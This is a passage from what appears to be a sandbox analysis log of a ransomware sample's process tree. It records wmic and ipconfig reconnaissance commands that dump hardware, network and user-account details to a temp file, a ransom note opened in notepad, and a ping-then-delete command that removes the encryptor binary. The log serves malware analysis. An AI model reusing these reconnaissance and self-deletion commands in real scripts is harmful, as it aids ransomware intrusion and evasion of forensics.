- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
    3⤵
    PID:3508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo NIC INFO: >> %TEMP%\DARHQFOMK"
  2⤵
  PID:2368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\DARHQFOMK"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2928
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic NIC get Description, MACAddress, NetEnabled, Speed
    3⤵
    PID:3216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo DISKDRIVE INFO: >> %TEMP%\DARHQFOMK"
  2⤵
  PID:1156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\DARHQFOMK"
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic DISKDRIVE get InterfaceType, Name, Size, Status
    3⤵
    PID:1392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo USERACCOUNT INFO: >> %TEMP%\DARHQFOMK"
  2⤵
  PID:2204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\DARHQFOMK"
  2⤵
  PID:640
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
    3⤵
    PID:2792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo IPCONFIG: >> %TEMP%\DARHQFOMK"
  2⤵
  PID:2828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "ipconfig >> %TEMP%\DARHQFOMK"
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:3992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo DATABASES FILES: >> %TEMP%\DARHQFOMK"
  2⤵
  PID:2704
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\enc.exe"
  2⤵
  PID:2424
- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 1 -w 3000
    3⤵
    - Runs ping.exe
    PID:3748